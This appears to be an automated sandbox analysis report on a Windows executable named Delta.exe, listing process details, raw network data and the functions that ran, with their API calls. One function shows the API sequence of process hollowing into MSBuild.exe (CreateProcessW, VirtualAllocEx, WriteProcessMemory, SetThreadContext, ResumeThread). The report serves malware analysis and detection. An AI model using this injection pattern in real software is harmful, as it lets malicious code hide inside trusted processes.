2024-12-31 16:21:25 UTC	1369	IN	Data Raw: 7a 36 6f 76 72 48 7a 54 54 66 51 46 2b 63 36 6e 42 47 45 47 45 72 77 64 32 42 74 6a 68 74 50 41 52 45 4f 36 64 5a 44 37 52 49 46 43 6e 6e 4e 55 72 58 65 52 7a 64 53 35 6e 70 37 38 6c 45 6f 47 72 4d 6b 52 52 32 4d 47 44 30 44 6f 75 79 75 6c 77 63 63 55 4b 57 36 4c 4f 69 69 74 6c 38 6e 52 44 63 45 79 5a 39 68 77 51 70 4b 64 5a 59 55 50 62 33 37 75 75 54 78 54 6d 6c 30 77 34 2f 45 77 61 34 71 48 4e 4f 55 33 4a 4a 57 70 6d 4d 4c 58 33 58 51 33 62 75 46 56 6b 56 63 72 75 39 2f 52 49 49 4f 76 4b 56 53 50 6b 46 79 7a 46 6e 38 6b 35 4e 65 6c 44 63 52 4e 55 67 71 45 79 46 59 2f 74 4c 32 4a 33 31 6f 36 47 7a 41 41 41 73 2f 70 69 4a 4f 49 43 45 65 43 4e 30 44 39 44 38 6e 77 41 42 56 6a 55 2f 77 6b 6c 77 35 49 4b 53 45 58 39 31 71 50 67 43 69 7a 6d 34 6a 55 45 30 7a Data Ascii: z6ovrHzTTfQF+c6nBGEGErwd2BtjhtPAREO6dZD7RIFCnnNUrXeRzdS5np78lEoGrMkRR2MGD0DouyulwccUKW6LOiitl8nRDcEyZ9hwQpKdZYUPb37uuTxTml0w4/Ewa4qHNOU3JJWpmMLX3XQ3buFVkVcru9/RIIOvKVSPkFyzFn8k5NelDcRNUgqEyFY/tL2J31o6GzAAAs/piJOICEeCN0D9D8nwABVjU/wklw5IKSEX91qPgCizm4jUE0z
2024-12-31 16:21:25 UTC	1369	IN	Data Raw: 77 68 31 76 39 46 35 6b 4a 58 79 35 35 67 39 53 6d 5a 38 31 59 58 72 73 39 59 62 58 44 79 79 79 32 54 35 2f 32 53 6b 4c 34 49 48 51 47 6e 48 50 56 45 4e 36 64 35 2f 36 4f 45 79 34 68 51 6c 41 5a 39 33 31 6f 72 30 34 50 73 6e 6d 5a 58 72 67 45 51 37 4d 31 50 49 4d 4d 49 64 31 52 6e 74 6f 69 61 63 35 44 34 4b 58 4a 47 78 46 6e 70 79 47 2b 7a 63 50 72 4d 5a 75 44 38 73 79 4c 38 43 4e 79 43 78 54 39 43 56 4d 4b 33 65 6f 38 56 4d 7a 6e 4c 73 6f 5a 6d 48 62 77 4b 4b 6e 4b 79 58 4f 6d 47 6f 62 7a 51 34 36 79 62 72 6c 4a 47 72 6f 53 55 5a 36 51 38 72 6f 50 54 36 30 6e 41 35 74 59 39 54 48 69 2b 52 4a 4b 75 71 5a 4d 54 6e 41 41 6a 58 6a 69 2f 31 43 64 65 68 48 58 77 52 58 6a 66 67 34 48 4c 2b 77 43 41 35 76 67 64 53 79 70 44 73 75 73 65 41 77 4c 63 59 42 4a 4d 69 Data Ascii: wh1v9F5kJXy55g9SmZ81YXrs9YbXDyyy2T5/2SkL4IHQGnHPVEN6d5/6OEy4hQlAZ931or04PsnmZXrgEQ7M1PIMMId1Rntoiac5D4KXJGxFnpyG+zcPrMZuD8syL8CNyCxT9CVMK3eo8VMznLsoZmHbwKKnKyXOmGobzQ46ybrlJGroSUZ6Q8roPT60nA5tY9THi+RJKuqZMTnAAjXji/1CdehHXwRXjfg4HL+wCA5vgdSypDsuseAwLcYBJMi
2024-12-31 16:21:25 UTC	1369	IN	Data Raw: 59 74 43 56 54 70 33 74 2b 4e 65 45 72 79 36 4d 47 39 63 6d 39 4b 48 7a 68 34 66 35 74 6c 4a 4c 65 4d 50 41 65 4f 38 36 78 78 7a 30 33 30 42 66 6e 33 4f 39 51 59 50 6d 2b 34 4e 51 57 44 55 7a 72 54 68 43 42 61 77 2f 45 63 62 34 77 34 51 78 71 76 4a 44 6b 37 2f 4b 41 51 47 55 4e 44 6f 4d 78 53 63 73 41 42 79 52 64 76 6d 72 61 41 71 47 36 6a 71 59 78 33 78 4b 79 7a 62 7a 50 4a 59 51 4d 68 56 64 48 39 4c 6f 74 49 38 41 36 72 74 42 6d 46 66 39 34 4f 4c 6f 54 73 49 35 73 42 4d 4a 38 64 4d 57 36 4b 6a 31 52 38 38 32 43 56 75 50 6e 66 51 70 78 6b 7a 68 35 45 6b 64 48 47 61 67 71 62 51 4c 69 54 66 2b 6c 63 48 35 43 52 62 39 35 4c 62 44 31 62 51 49 56 35 78 64 34 6a 33 4b 78 62 55 74 78 46 71 52 2f 71 4f 74 4d 55 38 44 76 44 38 51 41 66 37 4c 43 72 6a 71 4d 6f 44 Data Ascii: YtCVTp3t+NeEry6MG9cm9KHzh4f5tlJLeMPAeO86xxz030Bfn3O9QYPm+4NQWDUzrThCBaw/Ecb4w4QxqvJDk7/KAQGUNDoMxScsAByRdvmraAqG6jqYx3xKyzbzPJYQMhVdH9LotI8A6rtBmFf94OLoTsI5sBMJ8dMW6Kj1R882CVuPnfQpxkzh5EkdHGagqbQLiTf+lcH5CRb95LbD1bQIV5xd4j3KxbUtxFqR/qOtMU8DvD8QAf7LCrjqMoD

Target ID:	0
Start time:	11:21:12
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Delta.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Delta.exe"
Imagebase:	0x5e0000
File size:	813'568 bytes
MD5 hash:	24A858EBB9FC24D58BB3615386CE0F43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:21:12
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:21:13
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Delta.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Delta.exe"
Imagebase:	0x5e0000
File size:	813'568 bytes
MD5 hash:	24A858EBB9FC24D58BB3615386CE0F43
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 0061019E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00610110,00610100), ref: 00610334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00610347
Wow64GetThreadContext.KERNEL32(00000100,00000000), ref: 00610365
ReadProcessMemory.KERNELBASE(00000104,?,00610154,00000004,00000000), ref: 00610389
VirtualAllocEx.KERNELBASE(00000104,?,?,00003000,00000040), ref: 006103B4
WriteProcessMemory.KERNELBASE(00000104,00000000,?,?,00000000,?), ref: 0061040C
WriteProcessMemory.KERNELBASE(00000104,00400000,?,?,00000000,?,00000028), ref: 00610457
WriteProcessMemory.KERNELBASE(00000104,?,?,00000004,00000000), ref: 00610495
Wow64SetThreadContext.KERNEL32(00000100,027F0000), ref: 006104D1
ResumeThread.KERNELBASE(00000100), ref: 006104E0

Strings

aryA, xrefs: 006101E2
ReadProcessMemory, xrefs: 00610289
CreateProcessW, xrefs: 00610250
WriteProcessMemory, xrefs: 006102AF
VirtualAlloc, xrefs: 00610263
Load, xrefs: 006101DA
ResumeThread, xrefs: 006102D8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00610333
GetThreadContext, xrefs: 00610276
TerminateProcess, xrefs: 006103C3
VirtualAllocEx, xrefs: 0061029C
ress, xrefs: 00610226
SetThreadContext, xrefs: 006102C2
GetP, xrefs: 0061021E

Memory Dump Source

Source File: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: 02e16dd9f9f4e85b6712791531950e924a428932104d170e5fa026572e1f4f4c
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: BBB1097664064AAFDB60CF68CC80BDA73A5FF88714F198124EA0CAB341D774FA51CB94

Function 005E1C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 005E1C3B
CreateFileA.KERNELBASE ref: 005E1C94
GetFileSize.KERNEL32 ref: 005E1CC3
CloseHandle.KERNEL32 ref: 005E1CDF

Strings

CreateFileA, xrefs: 005E1C2E

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: File$AddressCloseCreateHandleProcSize
String ID: CreateFileA
API String ID: 2547132502-1429953656
Opcode ID: 43a39ca2659ae7be94aa29b137bdbbf48d759c44551d826959600d8fc82c4106
Instruction ID: 6986dcfe0d8e1599af8535b7e7604fa7874961985838fb59a04330f5c92b3deb
Opcode Fuzzy Hash: 43a39ca2659ae7be94aa29b137bdbbf48d759c44551d826959600d8fc82c4106
Instruction Fuzzy Hash: 7141C4B0D086499FCB04EFA9D9587AEBBF1FF48310F008929E899A7350D7749944CF96

Function 005F6642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,843561DF,?,005F6751,00000000,00000000,00000000,00000000), ref: 005F6703

Strings

api-ms-, xrefs: 005F6699
ext-ms-, xrefs: 005F66AD

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: e4361c61162e2197c4d2be06aa5c728d44acf1c7917ee5a044551af26d56da9c
Instruction ID: 2a5bc32e00e3202828035def8b3bafd340d309685caeaaeec9a644a70e48b0c9
Opcode Fuzzy Hash: e4361c61162e2197c4d2be06aa5c728d44acf1c7917ee5a044551af26d56da9c
Instruction Fuzzy Hash: D9210A32A41229ABD7319BA4DC44A7B3B69FB41760F251524FF15E7290EB38ED00C6E0

Function 005E20C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 005E20E6
GetProcAddress.KERNEL32 ref: 005E20FE
FreeConsole.KERNELBASE ref: 005E210D

Strings

FreeConsole, xrefs: 005E20F1
kernel32.dll, xrefs: 005E20DD

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: AddressConsoleFreeHandleModuleProc
String ID: FreeConsole$kernel32.dll
API String ID: 1635486814-2564406000
Opcode ID: 426ce22b5a1ebcd5549ef36166e85214c1d03e6d021dfc12d4d56f0baf65c1aa
Instruction ID: 96214aac2f04c2c701bbd9b9cfbe4e17354a7291698fb64a77b98febaf78c76e
Opcode Fuzzy Hash: 426ce22b5a1ebcd5549ef36166e85214c1d03e6d021dfc12d4d56f0baf65c1aa
Instruction Fuzzy Hash: CE01C970E002089FCB04EFB9D94959EBBF5BF48300F40896AE859D7351EB74A644CF82

Function 005F6E2A Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__alloca_probe_16.LIBCMT ref: 005F6EAF
__alloca_probe_16.LIBCMT ref: 005F6F78
__freea.LIBCMT ref: 005F6FDF

Part of subcall function 005F56F1: RtlAllocateHeap.NTDLL(00000000,005F7675,?,?,005F7675,00000220,?,?,?), ref: 005F5723

__freea.LIBCMT ref: 005F6FF2
__freea.LIBCMT ref: 005F6FFF

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 078abe79dcc968abb5331647d544cf342e117b07c6028593858e1886c3896ebd
Instruction ID: ea72bfb2470543296d752697694f77274cfc3a4a94817bb500140f48c0ee1720
Opcode Fuzzy Hash: 078abe79dcc968abb5331647d544cf342e117b07c6028593858e1886c3896ebd
Instruction Fuzzy Hash: 3B51BE7260028FAFEB259E65EC85EBB3EA9FF84750B150139FF04D6110EB39DC1086A0

Function 005E1DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 005E1E6E
VirtualProtect.KERNELBASE ref: 005E1EC3

Strings

@, xrefs: 005E1EB7
VirtualProtect, xrefs: 005E1E61

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: AddressProcProtectVirtual
String ID: @$VirtualProtect
API String ID: 3759838892-29487290
Opcode ID: ef662801e9a3caeed514c05031082ae1760193824657c7a6866493b93cb79daa
Instruction ID: 1086a75041c97ed012a79893b0f28709ea4f1e022f9178b876c2706ce84d7607
Opcode Fuzzy Hash: ef662801e9a3caeed514c05031082ae1760193824657c7a6866493b93cb79daa
Instruction Fuzzy Hash: 0A41D2B0901209DFDB04DFA9D9986DEBBF1FF48344F10881AE858AB350D7759A84CF85

Function 005EF293 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(005EF1A0,?,005EF355,00000000,?,?,005EF1A0,843561DF,?,005EF1A0), ref: 005EF2A4
TerminateProcess.KERNEL32(00000000,?,005EF355,00000000,?,?,005EF1A0,843561DF,?,005EF1A0), ref: 005EF2AB
ExitProcess.KERNEL32 ref: 005EF2BD

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 2e6b8d4978a3d958b5580f99b07e83fd068deec6f88ec18e2f6cb85d1ddb6786
Instruction ID: 6b44e83d5ffdc975f0a83ab10e715098952af52b5b0b10be574a06b1cdd56460
Opcode Fuzzy Hash: 2e6b8d4978a3d958b5580f99b07e83fd068deec6f88ec18e2f6cb85d1ddb6786
Instruction Fuzzy Hash: 76D06C36040199ABCF092FA2DC0D95A3F6ABF84391B549824BA495A071CF7299929B90

Function 005FD3A4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005FD74E: GetConsoleOutputCP.KERNEL32(843561DF,00000000,00000000,?), ref: 005FD7B1

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,005ED832,?,005EDA94), ref: 005FD529
GetLastError.KERNEL32(?,005ED832,?,005EDA94,?,005EDA94,?,?,?,?,?,?,?,00000000,?,?), ref: 005FD533

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 48993f109a27143f9e2d5b52ad13422b518139006399f7bb097f9e57665d25ba
Instruction ID: d161c057f4b88e925bc8958c55a7d4a86307e1f08b8b6551fc077e2566175824
Opcode Fuzzy Hash: 48993f109a27143f9e2d5b52ad13422b518139006399f7bb097f9e57665d25ba
Instruction Fuzzy Hash: 3561817290011EABDF11DFA8C888AFEBFBABF49308F140545EA04A7252D379D911CB71

Function 005F72A8 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005F74AD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 005F74D8

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,005F76B8,?,00000000,?,?,?), ref: 005F7309
GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,005F76B8,?,00000000,?,?,?), ref: 005F7345

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 51408780b7e817089f6efc504c6b42968bd4a06eed4514c4404090e15ec93b4a
Instruction ID: 6629f47d462b7be7088d788979f714feebbd3b9eea447f5a78cf77c1fa16221c
Opcode Fuzzy Hash: 51408780b7e817089f6efc504c6b42968bd4a06eed4514c4404090e15ec93b4a
Instruction Fuzzy Hash: B7512A70A0824D5EDB20CF35C8456BBBFF5FF89300F18486ED6968B291E7789546DB90

Function 005FDB7D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,005FD50F,?,005EDA94,?,?,?,00000000), ref: 005FDC19
GetLastError.KERNEL32(?,005FD50F,?,005EDA94,?,?,?,00000000,?,?,?,?,?,005ED832,?,005EDA94), ref: 005FDC3F

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: b484f76a0e24b07ea1baa9e4c13ed26ac12e202fe94e5e3dd6044f0c4fa7d2e2
Instruction ID: 3ea377668d81a85710b0a02f960712f189f02a33397bf76e579be9c6e9d66137
Opcode Fuzzy Hash: b484f76a0e24b07ea1baa9e4c13ed26ac12e202fe94e5e3dd6044f0c4fa7d2e2
Instruction Fuzzy Hash: AD218230A002199FCB19CF29DC909E9BBBAFB89305F1441A9EA46D7251D6309E42CF64

Function 005F7192 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,005F7081,0060FCD8,0000000C), ref: 005F71DE
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,005F7081,0060FCD8,0000000C), ref: 005F71F0

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 6b8730be9d66508e4a6ba3f8957f6666d64f17198606e7d347a5aeba43bc9d63
Instruction ID: bc792c7316f5e978855cae3c797fde15408b12d65cefb032fdc2cb76739fab56
Opcode Fuzzy Hash: 6b8730be9d66508e4a6ba3f8957f6666d64f17198606e7d347a5aeba43bc9d63
Instruction Fuzzy Hash: 4511E43510C74D4AC7308E3E8C88A367E96BB5A370B380B5AE6B6C65F1C738C94AC640

Function 005E2010 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 005E2038
GetModuleFileNameW.KERNEL32 ref: 005E2058

Memory Dump Source

Source File: 00000000.00000002.1693409512.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.1693391821.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693437465.0000000000606000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693456077.0000000000610000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693471503.0000000000611000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693492898.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693511643.0000000000617000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_Delta.jbxd

Similarity

API ID: Module$FileHandleName
String ID:
API String ID: 4146042529-0
Opcode ID: 2b439373881acf2a08fb0d72fd886356a33f894e783ece5c00bab853b01513c6
Instruction ID: f1269c891a9a296a5fe3f7d443bb2910c966811d345b54b5105135e44bbec206
Opcode Fuzzy Hash: 2b439373881acf2a08fb0d72fd886356a33f894e783ece5c00bab853b01513c6
Instruction Fuzzy Hash: CD01ECB09043198FDB15EF68D54969EBBF8BB48300F4188ADE499D3341EB745A88CF92

Function 005F64F3 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LCMapStringEx.KERNELBASE(?,005F6F1A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 005F6527
